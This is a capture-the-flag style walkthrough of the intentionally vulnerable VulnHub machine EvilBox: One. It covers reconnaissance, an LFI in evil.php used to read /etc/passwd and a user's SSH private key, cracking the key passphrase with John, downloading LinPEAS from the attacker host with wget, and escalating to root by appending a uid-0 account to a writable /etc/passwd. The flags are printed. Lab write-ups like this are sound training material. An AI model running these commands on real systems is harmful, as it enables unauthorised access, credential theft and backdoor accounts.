Evilbox: 1 || VulnHub Complete Walkthrough

Hello everyone! Welcome all of my viewers, to this brand-new video. In today's tutorial, we will be dealing with a vulnerable machine, categorized as " Easy " in terms of difficulty. 


To begin with, you'll need to download the vulnerable image from the VulnHub website. If you're not familiar with VulnHub yet, feel free to check out these videos on the VulnHub playlist.


Vulhub - Vulnerable By Design

Vulhub is a collection of pre-built vulnerable docker environments that are designed for learning and practicing security testing. It provides various intentionally vulnerable web applications and services for hands-on security training.


Settings Up

After you've successfully downloaded the image, it's time to set up the server using VirtualBox, which is a straightforward process.

1. Launch VirtualBox, Go to the "File" menu, and select "Import Appliance". 

2. Import the downloaded OVA file. 

Browse your computer to locate the download file and click "Next."

3. Review the appliance details and settings. 

You can keep the default settings or make adjustments based on your needs.

4. Click "Finish" to begin importing.

Once the import is done, the “EvilBox one” vulnerable machine will appear in the VirtualBox Manager. 

5. Select the virtual machine and click "Settings", and change the network adapter to " Host-only adapter ".

Make sure that both your Kali Linux Machine, which is used for performing attacks, and your vulnerable machine must be connected to the same network.

Once the setup is done, it's time to start the Virtual Machines. 

You'll notice that our Vulnerable Machine is all set, and we now have a login prompt waiting for us. 

Let's dive into the fun!

 

Enumeration

Enumeration is the first process of our attack, aimed at identifying the IP Address of our Target Machine using NetDiscover. To do this, open a terminal, and run the following command:

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1

 Currently scanning: 192.168.100.0/16   |   Screen View: Unique Hosts                                                          
                                                                                                                               
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.95.101  08:00:27:11:2c:8e      1      60  PCS Systemtechnik GmbH                                                      
 192.168.95.107  0a:00:27:00:00:0e      1      60  Unknown vendor                                                              
 192.168.95.115  08:00:27:ba:2f:2e      1      60  PCS Systemtechnik GmbH                                                      

From the scan result, we have obtained our target IP address, which is, " 192.168.95.115 ".


Performing Network Scans with Nmap

Next, we perform a network scan to detect what ports are open. Scanning the Network is an essential part of the enumeration process. This allows us to understand the attack surface and plan targeted attacks. For this purpose, we'll use the popular Nmap tool. Use the following command on the terminal:

nmap -sC -sV 192.168.95.115

Where, 

  • -sC is used to perform a script scan using the default set of scripts, and 
  • -sV is used to enable version detection, which will detect, what versions are running on what port.  

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 192.168.95.115
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-01 17:11 EDT
Nmap scan report for 192.168.95.115
Host is up (0.0014s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 4495500be473a18511ca10ec1ccbd426 (RSA)
|   256 27db6ac73a9c5a0e47ba8d81ebd6d63c (ECDSA)
|_  256 e30756a92563d4ce3901c19ad9fede64 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.49 seconds
                                                                                                                                
┌──(kali㉿kali)-[~]
└─$ 

From the Network scanning, we have spotted two open ports.

  • The Port 22/TCP runs an SSH service, indicating that with valid credentials, gaining login access to the server will be straightforward
  • Port 80/TCP runs an HTTP service, suggesting a vulnerable website is being hosted.


Web Enumeration and Directory Discovery with Gobuster

Now, let's explore the content of the website running on Port 80. To look at the contents ourselves, open a web browser of your choice, and navigate to the target’s IP address in the URL bar at the top of the window.

Apache2 Debian default Webpage

Upon visiting the webpage, we discovered " Apache2 Debian default Webpage ." Unfortunately, there doesn't seem to be any valuable information visible on the page. To dig deeper, we can inspect the page's source code by right-clicking on the page. 

View-Source Mode


There is nothing valuable information. To further investigate the target URL, we will conduct directory busting to uncover hidden or difficult-to-access directories and pages. For this task, we'll use the " gobuster " tool with the following command:

gobuster dir -u http://192.168.95.115/ -w "/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt" 

Where, 

  • gobuster dir is used to instruct gobuster to perform directory busting.
  • -u is used to specify the target URL we want to explore. 
  • -w is used to provide the path to the wordlist containing common directory names to try.

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.95.115/ -w "/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt"  
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.95.115/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/08/01 17:16:17 Starting gobuster in directory enumeration mode
===============================================================
/secret               (Status: 301) [Size: 317] [--> http://192.168.95.115/secret/]
/server-status        (Status: 403) [Size: 279]
Progress: 219482 / 220561 (99.51%)
===============================================================
2023/08/01 17:17:40 Finished
===============================================================
                                                                                                                                
┌──(kali㉿kali)-[~]
└─$

Using the directory-busting tool, we have identified two crucial directories. One of them is named " /secret," and it returns a status code of 301. 

The HTTP code 301 signifies a "Moved Permanently" response, indicating that the URL has been permanently redirected.

Upon exploring the " /secret " web directory, we encountered an empty page. 

Let’s enumerate further to gather more information. 

To gather more information, we can view the page's source code by right-clicking on the page and selecting the "view page source" option.

Unfortunately, we haven't come across any useful information at this point. However, our investigation is ongoing, and we may need to explore further to uncover potential vulnerabilities or sensitive data.

Let's continue our investigation by using "gobuster" to perform directory busting, which helps us uncover hidden or challenging-to-access directories and pages. Here, I suspect there might be PHP, HTML, or other text files of interest. To delve deeper, let's run another round of directory busting with the "-x" flag. 

gobuster dir -u http://192.168.95.115/secret/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html

Where,

  • -x flag enables us to focus our search on specific file types, as needed.

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.95.115/secret/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.95.115/secret/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              txt,php,html
[+] Timeout:                 10s
===============================================================
2023/08/01 17:23:31 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 4]
/.php                 (Status: 403) [Size: 279]
/evil.php             (Status: 200) [Size: 0]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
Progress: 882060 / 882244 (99.98%)
===============================================================
2023/08/01 17:30:02 Finished
===============================================================
                                                                                                                                 
┌──(kali㉿kali)-[~]
└─$ 

Upon completing the modified directory busting, we made a significant discovery. We stumbled upon a webpage named " evil.php " with a status code of 200. 

The status code 200 , indicates that the request was successful, and the web page's content is available in the message body.

As we visited the " /evil.php " webpage, we found it to be empty. To gain more insights, let's analyze the webpage's source code by right-clicking with the mouse and selecting "view page source."

Although we didn't find any valuable information at first glance, a closer examination suggests that the webpage might be susceptible to LFI (Local File Inclusion)



Detecting Local File Inclusion (LFI) Vulnerabilities with FFUF

LFI (Local File Inclusion) vulnerability could potentially allow us to access sensitive files from the server. To verify this, we'll need to conduct further tests to identify any LFI vulnerabilities present in the URL.

Let's proceed with identifying any potential Local File Inclusion (LFI) vulnerabilities in the URL if any exist in the URL.

Firstly, we need to identify the parameters used in the URL. Parameters are usually denoted by a question mark (?) followed by key-value pairs.


After manual testing, we have not yet successfully gained any valuable information. 

To further investigate, we'll use "ffuf," an automatic fuzzing tool. We'll test various payloads in the parameters to identify potential vulnerabilities.

Use the following command to perform fuzzing against the specified URL.

ffuf -u "http://192.168.95.115/secret/evil.php?FUZZ=../../../../../etc/passwd" -w "/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt" -c -r -fs 0

In this command, 

  • -u is used to specify the target URL for fuzzing, 
  • -w is used to specify the wordlist containing the payloads to be tested, 
  • -c is used to color output for better readability, 
  • -r is used to follow redirects while fuzzing
  • -fs is used to filter responses based on HTTP status code 0 (that is, show all responses).

┌──(kali㉿kali)-[~]
└─$ ffuf -u "http://192.168.95.115/secret/evil.php?FUZZ=../../../../../etc/passwd" -w "/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt" -c -r -fs 0

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.95.115/secret/evil.php?FUZZ=../../../../../etc/passwd
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : true
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 0
________________________________________________

[Status: 200, Size: 1398, Words: 13, Lines: 27, Duration: 24ms]
    * FUZZ: command

:: Progress: [220560/220560] :: Job [1/1] :: 1515 req/sec :: Duration: [0:02:19] :: Errors: 0 ::
                                                                                                                                
┌──(kali㉿kali)-[~]
└─$ 

Upon completion of the fuzzing, we discovered that the target URL is vulnerable to LFI, and the output parameter is "command". Let's return to the web browser and test the newly discovered parameter. 

After attempting to access it, we found sensitive files including the "/etc/passwd" file. After examining the contents of the "/etc/passwd" file, we came across a username associated with the vulnerable machine, namely "mowree."


Gaining SSH Access by Extracting Private Key via LFI

From Nmap, we have discovered that the vulnerable machine has Port 22 open with an SSH service, which means, that obtaining both the username and password would provide us with foothold access to the server.

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 4495500be473a18511ca10ec1ccbd426 (RSA)
|   256 27db6ac73a9c5a0e47ba8d81ebd6d63c (ECDSA)
|_  256 e30756a92563d4ce3901c19ad9fede64 (ED25519)

As we don't currently possess a valid password, we need to explore alternative methods to access the vulnerable machine through SSH. Fortunately, we have identified a potential approach – utilizing the "id_rsa" file.

SSH (Secure Shell) relies on key-based authentication, and having the "id_rsa" file grants us a significant advantage. This file contains the private key necessary for authentication without requiring a password. By leveraging this private key, we can potentially gain access to the SSH service running on the vulnerable machine.

After conducting a search on Google for the default file path of SSH in Linux, we uncovered the standard location for the SSH private key, (i.e., ~/.ssh/id_rsa). 

This valuable information enables us to target and access the private key associated with the SSH service on the vulnerable machine. Armed with this knowledge, we can proceed with our efforts to gain entry into the system.

To access the SSH private key, we can confidently navigate to the user's home directory, " /home/mowree ." It is common knowledge that the /.ssh file, which houses the SSH private key, is often stored within the user's home directory. 

By accessing this location, we are one step closer to obtaining the crucial private key required for SSH access to the vulnerable machine.

Returning to the browser, we can now navigate to the file path of the SSH private key, which is located at " /home/mowree/.ssh/id_rsa ."

Upon reaching this path, we successfully discover the SSH private key. To preserve its contents, we copy the key and paste it into a text editor, saving it with the filename " id_rsa ."

Having obtained the private key, we can now proceed to gain access to the server effortlessly using an SSH client tool. The private key will serve as the authentication mechanism, allowing us to establish a secure and privileged connection to the vulnerable server.

 

Foothold

Now that we have the " id_rsa " private key, we can use it to gain access and establish a foothold on the server. However, before running the SSH command, we need to ensure that the permissions on the "id_rsa" file are set correctly.

┌──(kali㉿kali)-[~]
└─$ ls -al id_rsa 
-rw-r--r-- 1 kali kali 1743 Aug  1 17:50 id_rsa
                                                                                                                                
┌──(kali㉿kali)-[~]
└─$

To do this, we will use the " chmod " command-line utility to modify the file's read and write permissions. Type the following command: " chmod 600 id_rsa ". 

┌──(kali㉿kali)-[~]
└─$ chmod 600 id_rsa 
                                                                                                                                
┌──(kali㉿kali)-[~]
└─$ ls -al id_rsa   
-rw------- 1 kali kali 1743 Aug  1 17:50 id_rsa
                                                                                                                                
┌──(kali㉿kali)-[~]
└─$

This will set the file's permissions to allow read and write access only for the owner of the file, and no access for any other users or groups. 

By setting these permissions, we enhance the security of the private key and ensure that only the appropriate user can access it. Now, we are ready to use the " id_rsa " key with the SSH client tool to gain entry into the server.

Let's proceed with the SSH connection. Type the following command:

ssh -i id_rsa [email protected]

This will instruct SSH to use the "id_rsa" private key for authentication.

┌──(kali㉿kali)-[~]
└─$ ssh -i id_rsa [email protected]
The authenticity of host '192.168.95.115 (192.168.95.115)' can't be established.
ED25519 key fingerprint is SHA256:0x3tf1iiGyqlMEM47ZSWSJ4hLBu7FeVaeaT2FxM7iq8.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:8: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.95.115' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa': 

Upon initiating the SSH connection, you may be prompted to provide the passphrase for the "id_rsa" key. 

Passphrases are an additional layer of security for private keys. If the private key was generated with a passphrase, you'll need to enter it before gaining access to the server.

Enter passphrase for key 'id_rsa': 

Now, we encounter a challenge as the private key requires a passphrase, which we don't know. However, we have a potential solution by attempting to brute-force the passphrase using a password-cracking tool called John the Ripper

You might be familiar with the process if you've watched a tutorial or video on cracking SSH keys.


Decrypting SSH Key Files with John The Ripper

Open a new terminal and use the " ssh2john " tool to extract the hash file from the " id_rsa " private key. 

┌──(kali㉿kali)-[~]
└─$ ls
Desktop  Documents  Downloads  id_rsa  Music  Pictures  Public  Templates  Videos
                                                                                                                                
┌──(kali㉿kali)-[~]
└─$ ssh2john id_rsa > hash
                                                                                                                                
┌──(kali㉿kali)-[~]
└─$ 

Next, type " john " followed by the hash file path and specify the " rockyou.txt " wordlist using the " --wordlist= " flag.

┌──(kali㉿kali)-[~]
└─$ sudo john hash --wordlist= /usr/share/wordlists/rockyou.txt 
[sudo] password for kali: 
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-c to abort, almost any other key for status
unicorn      (id_rsa)
1g 0:00:00:00 DONE (2023-07-26 15:29) 12.50g/s 15600p/s 15600c/s 15600C/s pedro..shirley
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

┌──(kali㉿kali)-[~]
└─$

Upon executing the command, John the Ripper will start its password-cracking process. If successful, it will provide us with the passphrase for the private key, which will give us the access that we need.

Now that we have successfully obtained the passphrase for the private key, let's make another attempt to establish an SSH connection.

┌──(kali㉿kali)-[~]
└─$ ssh -i id_rsa [email protected]
Enter passphrase for key 'id_rsa': unicorn
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$

As you can see, we have gained access to the Evilbox vulnerable machine. 

To proceed further, let's locate the user flag, which is typically found in the same directory. You can use the "ls" command to verify its presence. 

mowree@EvilBoxOne:~$ ls
user.txt
mowree@EvilBoxOne:~$

Once you identify the user flag, you can utilize the " cat " command to view its contents and accomplish the next step in our exploration.

mowree@EvilBoxOne:~$ cat user.txt
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ
mowree@EvilBoxOne:~$ 

As you can see, we have successfully obtained the user flag. Now, our primary focus is to acquire the root flag. 

mowree@EvilBoxOne:~$ cd /root
-bash: cd: /root: Permiso denegado
mowree@EvilBoxOne:~$

Upon navigating to the root directory to obtain the root flag, we need root permission.

It appears to be like that, we lack the necessary permissions to access the root directory. Therefore, let's proceed with Privilege Escalation to elevate our privileges and gain access to the root flag.

 

Privilege Escalation

During privilege escalation, the first step is to gather information about the system and identify potential vulnerabilities or misconfigurations that could allow us to elevate our privileges to gain access to the root level.

Firstly, Enumerate User Permissions to check, the user's privileges and rights on the system. This can be done by running commands like " sudo -l " or " id " to see what commands the current user can run with elevated privileges.

Let me run the “id” command to find the user and group names, and numeric IDs like UID, or group ID of the current user or any other user on the server. 

mowree@EvilBoxOne:~$ id
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
mowree@EvilBoxOne:~$

Upon running the "id" command, we discovered that both the UID and group belong to the user "mowree".

Let's check the rights and privileges of the current user by running the " sudo -l " command. 

mowree@EvilBoxOne:~$ sudo -l
-bash: sudo: orden no encontrada
mowree@EvilBoxOne:~$

After executing the command, we discover that the user " mowree " does not have any special sudo privileges or orders available to them.


Privilege Enumeration with LinPEAS

Now, our best option is to use LinPEAS

As mentioned earlier, LinPEAS is a powerful tool used to extract various information, including SUID binaries, vulnerabilities, and more, which can aid in privilege escalation.

To get started, you need to download LinPEAS from its GitHub repository. 


PEASS-ng - Privilege Escalation Awesome Scripts SUITE new generation

PEASS-ng is a collection of privilege escalation scripts for Windows and Linux. It provides a comprehensive set of tools and scripts to assist in identifying potential privilege escalation vectors during security assessments and penetration testing.


Once you have LinPEAS, initiate a " Python3 HTTP server ".

┌──(kali㉿kali)-[~/Downloads]
└─$ ls
linpeas.sh
                                                                                                                                
┌──(kali㉿kali)-[~/Downloads]
└─$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...

Now, we need to download LinPEAS on the target system. Let's switch back to the target server and navigate to the "/tmp" directory.

mowree@EvilBoxOne:~$ cd /tmp
mowree@EvilBoxOne:/tmp$

To download LinPEAS, we will use the " wget " command followed by the IP address of the machine running the Python3 HTTP server

wget http:// {LHOST IP} : {LPORT} /linpeas.sh

If you are unsure about the IP address of your host-only adapter, you can use the "ifconfig" command to find it.

mowree@EvilBoxOne:/tmp$ wget http://192.168.95.102:8080/linpeas.sh
--2023-08-02 00:30:48--  http://192.168.95.102:8080/linpeas.sh                                                                   
Conectando con 192.168.95.102:8080... conectado.                                                                                 
Petición HTTP enviada, esperando respuesta... 200 OK                                                                             
Longitud: 836054 (816K) [text/x-sh]                                                                                              
Grabando a: “linpeas.sh”                                                                                                         
                                                                                                                                 
linpeas.sh                       100%[=======================================================>] 816,46K  --.-KB/s    en 0,02s    
                                                                                                                                 
2023-08-02 00:30:48 (33,8 MB/s) - “linpeas.sh” guardado [836054/836054]                                                          
                                                                                                                                 
mowree@EvilBoxOne:/tmp$ 

After successfully downloading LinPEAS on the attack server, we can use the " ls " command to check, if the file exists. 

mowree@EvilBoxOne:/tmp$ ls                                                                                                       
linpeas.sh                                                                                                                       
systemd-private-76e78b152f894f4783f8ebc5c26e9a79-apache2.service-MR7Bzu                                                          
systemd-private-76e78b152f894f4783f8ebc5c26e9a79-systemd-timesyncd.service-4ikxFV                                                
mowree@EvilBoxOne:/tmp$

Now, let's verify if LinPEAS has the necessary execution permissions.

mowree@EvilBoxOne:/tmp$ ls -al linpeas.sh 
-rw-r--r-- 1 mowree mowree 836054 ago  2 00:28 linpeas.sh                                                                        
mowree@EvilBoxOne:/tmp$

It appears that LinPEAS lacks execution permission at the moment. We can grant the required permission by using the " chmod +x linpeas.sh " command. 

mowree@EvilBoxOne:/tmp$ chmod +x linpeas.sh                                                                                      
mowree@EvilBoxOne:/tmp$ ls -al linpeas.sh 
-rwxr-xr-x 1 mowree mowree 836054 ago  2 00:28 linpeas.sh                                                                        
mowree@EvilBoxOne:/tmp$

Once the execution permission is granted, we can run the " linpeas.sh " file. 

mowree@EvilBoxOne:/tmp$ ./linpeas.sh 

After running "linpeas.sh", this tool will generate its output, providing comprehensive information, including SUID binaries, vulnerabilities, and other relevant data, to aid in the privilege escalation process.

After analyzing the LinPEAS output, I made a significant discovery: the /etc/passwd file is writable. This presents an opportunity for Privilege Escalation as we can modify the /etc/passwd file. 

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d                                  
                                                                                                                                 
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable                                                                
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No                                                                                     
═╣ Can I read shadow plists? ............ No                                                                                     
═╣ Can I write shadow plists? ........... No                                                                                     
═╣ Can I read opasswd file? ............. No                                                                                     
═╣ Can I write in network-scripts? ...... No                                                                                     
═╣ Can I read root folder? .............. No      

By adding a new username and password, we might be able to elevate our privileges and gain higher access to the system.


Writable /etc/passwd Privilege Escalation

To do this, we'll use the openssl command line tool to generate an encrypted password for the new user.

First, we'll display the contents of the " /etc/passwd " file by typing " cat " followed by the file path. 

mowree@EvilBoxOne:/tmp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash                                                                                                  
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin                                                                                  
bin:x:2:2:bin:/bin:/usr/sbin/nologin                                                                                             
sys:x:3:3:sys:/dev:/usr/sbin/nologin                                                                                             
sync:x:4:65534:sync:/bin:/bin/sync                                                                                               
games:x:5:60:games:/usr/games:/usr/sbin/nologin                                                                                  
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin                                                                                  
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin                                                                                     
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin                                                                                      
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin                                                                                
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin                                                                              
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin                                                                                       
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin                                                                             
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin                                                                             
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin                                                                    
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mowree@EvilBoxOne:/tmp$

Next, we'll have to copy the structure of the " root " user and paste it into a text editor.

Text-editor

Instead of "x" replace it with a dollar sign. Inside the brackets, we'll use the " openssl passwd -6 -salt <user_name> <password> ". 

  • Instead of " root," we'll use the new username for the user that we want to create. 

technoscience : $(openssl passwd -6 -salt technoscience password123) :0:0: technoscience :/root:/bin/bash

Where, 

  • the " -6 " flag indicates an SHA-512 hash
  • the "-salt" flag adds salt to the hash for security.

After that, we'll add the " echo " command to save the changes to the " /etc/passwd " file.

echo " technoscience:$(openssl passwd -6 -salt technoscience password123):0:0:technoscience:/root:/bin/bash " >> /etc/passwd   

Finally, we'll copy the newly generated command, and paste the entire command into the terminal to add the new user.

mowree@EvilBoxOne:/tmp$ echo "technoscience:$(openssl passwd -6 -salt technoscience password123):0:0:technoscience:/root:/bin/bash" >> /etc/passwd                                                                                                                
mowree@EvilBoxOne:/tmp$

You can verify, if our command was successfully executed or not, using the " cat " command:

mowree@EvilBoxOne:/tmp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin                                                                                  
...........More........
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
technoscience:$6$technoscience$HzTWWWguPL9gyLn4ipfSLtsDt2YX1lYs67r3aJG04rvoVa31N9.FWB37gyEbTn1jGQkzTZ4C/kJLc5D0awgs1/:0:0:technoscience:/root:/bin/bash
mowree@EvilBoxOne:/tmp$

With the newly created user, we can now switch to root privileges by running the "su" command. 

mowree@EvilBoxOne:/tmp$ su technoscience
Contraseña: password123                                                                                                                      
root@EvilBoxOne:/tmp#

Once we have successfully gained root access, we can verify it using the " whoami " command, which should display " root " as the current user.

root@EvilBoxOne:/tmp# whoami                                                                                                     
root                                                                                                                             
root@EvilBoxOne:/tmp#

Now, that we have root privileges, we can access the root flag. To check if the root flag exists, simply type the " ls " command. 

root@EvilBoxOne:~# ls
root.txt                                                                                                                         
root@EvilBoxOne:~#

Once confirmed, we can use the "cat" command to view the contents of the root flag. 

root@EvilBoxOne:~# cat root.txt                                                                                                  
36QtXfdJWvdC0VavlPIApUbDlqTsBM                                                                                                   
root@EvilBoxOne:~#                                                                                                               

By doing so, we have successfully acquired the root flag, indicating that we now have full control over the system.

If you have any questions or doubts, feel free to leave a comment in the comment section below. I'll be happy to help and address any inquiries you may have.

Tags

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!